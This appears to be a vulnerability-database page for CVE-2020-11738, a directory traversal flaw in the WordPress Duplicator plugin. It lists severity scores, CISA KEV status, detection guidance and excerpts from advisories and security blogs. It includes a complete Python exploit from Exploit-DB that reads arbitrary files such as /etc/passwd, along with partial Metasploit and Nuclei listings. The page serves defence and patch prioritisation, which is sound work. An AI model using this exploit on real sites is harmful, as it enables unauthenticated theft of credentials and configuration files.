CVE-2020-11738
published 2020-04-13CVE-2020-11738: The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to…
PriorityP186high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
97.82%
99.9th percentile
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awesomemotive | duplicator | < 1.3.28 | 1.3.28 |
| awesomemotive | duplicator | < 3.8.7.1 | 3.8.7.1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for unauthenticated GET requests to /wp-admin/admin-ajax.php with action=duplicator_download or action=duplicator_init and a 'file' parameter containing directory traversal sequences (../ or URL-encoded %2F..%2F). ↗
- →Flag requests where the 'file' parameter contains sequences of multiple '../' (e.g., 11 levels deep: '../../../../../../../../..') targeting sensitive files like /etc/passwd or wp-config.php. ↗
- →This vulnerability was actively exploited in the wild at time of discovery; treat any matching traffic as high-priority incident. The vulnerability is present only in Duplicator versions 1.3.24 and 1.3.26 (not in 1.3.22 and before). ↗
- ·The vulnerability is version-specific: only Duplicator 1.3.24 and 1.3.26 are affected. Versions 1.3.22 and earlier are NOT vulnerable, and versions 1.3.28+ (Pro: 3.8.7.1+) are patched. Tune detections to avoid false positives on patched or older unaffected installs. ↗
- ·Exploitation requires no authentication (unauthenticated arbitrary file read), so blocking based on authenticated session presence is not a viable mitigation or detection filter. ↗
- ·Both the free 'Duplicator' and 'Duplicator Pro' plugins are affected (Pro before 3.8.7.1). Ensure detection/patching coverage includes both plugin variants. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wfr8-hp36-c4v2: The Snap Creek Duplicator plugin before 1
ghsa_unreviewed·2022-05-24
CVE-2020-11738 [MEDIUM] CWE-22 GHSA-wfr8-hp36-c4v2: The Snap Creek Duplicator plugin before 1
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
VulnCheck
WordPress Snap Creek Duplicator Plugin File Download Vulnerability
vulncheck·2020·CVSS 7.5
CVE-2020-11738 [HIGH] CWE-22 WordPress Snap Creek Duplicator Plugin File Download Vulnerability
WordPress Snap Creek Duplicator Plugin File Download Vulnerability
WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their Wordpress dashboard. This vulnerability affects Duplicator and Dulplicator Pro.
Affected: WordPress Snap Creek Duplicator Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2020-11738; https://dashboard.shadowserve
CISA
WordPress Snap Creek Duplicator Plugin File Download Vulnerability
cisa·2021-11-03·CVSS 7.5
CVE-2020-11738 [HIGH] CWE-22 WordPress Snap Creek Duplicator Plugin File Download Vulnerability
Vulnerability: WordPress Snap Creek Duplicator Plugin File Download Vulnerability
Affected: WordPress Snap Creek Duplicator Plugin
WordPress Snap Creek Duplicator plugin contains a file download vulnerability when an administrator creates a new copy of their site that allows an attacker to download the generated files from their Wordpress dashboard. This vulnerability affects Duplicator and Dulplicator Pro.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-11738
Remediation Due Date: 2022-05-03
No detection rules found.
Exploit-DB
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
exploitdb·2021-10-18·CVSS 7.5
CVE-2020-11738 [HIGH] Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
---
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
import requests as re
import sys
if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()
arg = sys.argv[1]
file = sys.argv[2]
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
output = re.get(url = URL)
print(output.text)
Exploit-DB
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)
exploitdb·2020-12-18
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)
Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'WordPress Duplicator File Read Vulnerability',
'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.},
'References' =>
[
['CVE', '2020-11738'],
['WPVDB', '10078'],
['URL', 'https://snapcreek.com/duplicator/docs/changelog']
],
'Author' =>
[
'Ramuel Gall', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team'
Nuclei
WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-11738 [HIGH] WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
versions v1.3.24 and v1.3.26, the vulnerability wasn't
present in versions 1.3.22 and before.
Template:
id: CVE-2020-11738
info:
name: WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
author: dwisiswant0
severity: high
description: |
WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
versions v1.3
Metasploit
WordPress Duplicator File Read Vulnerability
metasploit
WordPress Duplicator File Read Vulnerability
WordPress Duplicator File Read Vulnerability
This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.htmlhttp://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.htmlhttps://cwe.mitre.org/data/definitions/23.htmlhttps://snapcreek.com/duplicator/docs/changelog/?litehttps://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.htmlhttp://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.htmlhttps://cwe.mitre.org/data/definitions/23.htmlhttps://snapcreek.com/duplicator/docs/changelog/?litehttps://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-11738
2020-04-13
Published
2021-11-03
Added to CISA KEV
Exploited in the wild